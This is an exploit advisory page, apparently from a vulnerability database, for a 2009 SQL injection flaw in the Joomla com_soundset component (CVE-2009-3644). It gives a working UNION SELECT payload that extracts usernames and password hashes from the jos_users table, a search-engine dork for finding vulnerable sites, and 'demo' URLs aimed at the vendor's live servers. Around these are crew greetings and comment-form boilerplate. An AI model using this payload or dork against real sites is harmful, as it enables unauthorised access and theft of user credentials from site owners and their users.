Joomla Component com_soundset (cat_id) Remote SQL Injection Vulnerability

2009.10.12

Credit: kaMtiEz

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-3644

CWE: CWE-89

Dork: inurl:\"com_soundset\"

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

/********************************************************************************

[~] Joomla Component com_soundset Remote SQL injection vulnerability - (cat_id)
[~] Author	: kaMtiEz (kamzcrew@gmail.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: October 4, 2009
[~] Tune In	: http://antisecradio.fm (choose your weapon)

********************************************************************************/

[ Software Information ]

[+] Vendor : http://www.soundset.at/
[+] Download : -
[+] version : 1.0
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_soundset"
[+] Price : EUR 119.00

================================================================================

[ Vulnerable File ]

http://127.0.0.1/ndex.php?option=com_soundset&controller=showcategory&cat_id=[INDONESIANCODER]

[ Exploit ]

-666+union+select+1,2,concat_ws(0x3a,username,password)kaMtiEz,4,5+from+jos_users--

[ Demo ]

http://www.soundset.at/cms/index.php?option=com_soundset&controller=showcategory&cat_id=-666+union+select+1,2,concat_ws(0x3a,username,password)kaMtiEz,4,5+from+jos_users--

http://joomla.soundset.at/index.php?option=com_soundset&controller=showcategory&cat_id=-666+union+select+1,2,concat_ws(0x3a,username,password)kaMtiEz,4,5+from+jos_users--

================================================================================

[ Thx TO ]

[+] INDONESIAN CODER TEAM - KILL-9 CREW - KIRIK CREW - MainHack Brotherhood - ServerIsDown
[+] Don Tukulesto, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, och3_an3h
[+] Contrex, onthel, yasea, bugs, olivia, Jovan, Aar, Ardy, invent, Ronz
[+] Coracore, black666girl, NepT, ichal, tengik, Gh4mb4s ,rendy, Jack- and YOU!!

[ NOTE ] 

[+] Mom and dad i love u .. for my girlfriends thx for your support mwahhhh ^_^
[+] terima kasih banget buat tukulesto dan arianom yang setiap malam menemani saya waktu exploit .. wkwkwkw
[+] terima kasih buat vYc0d yang menemani saya waktu YM an jangan lupa kuliah e ojo fb nan terus ! wkwkw.. wkwkwkkwkw

[ QUOTE ]

[+] kaMtiEz -=- Don Tukulesto -=- M3NW5 -=- 30 hari mencari AuraKasih dan masih belum ketemu juga :"( wkwkw ....
[+] AURAKASIH I MISS U FULL arghhhhh ...

References:

http://www.securityfocus.com/bid/36597

http://packetstormsecurity.org/0910-exploits/joomlasoundset-sql.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla Component com_soundset (cat_id) Remote SQL Injection Vulnerability

Dork: inurl:\"com_soundset\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.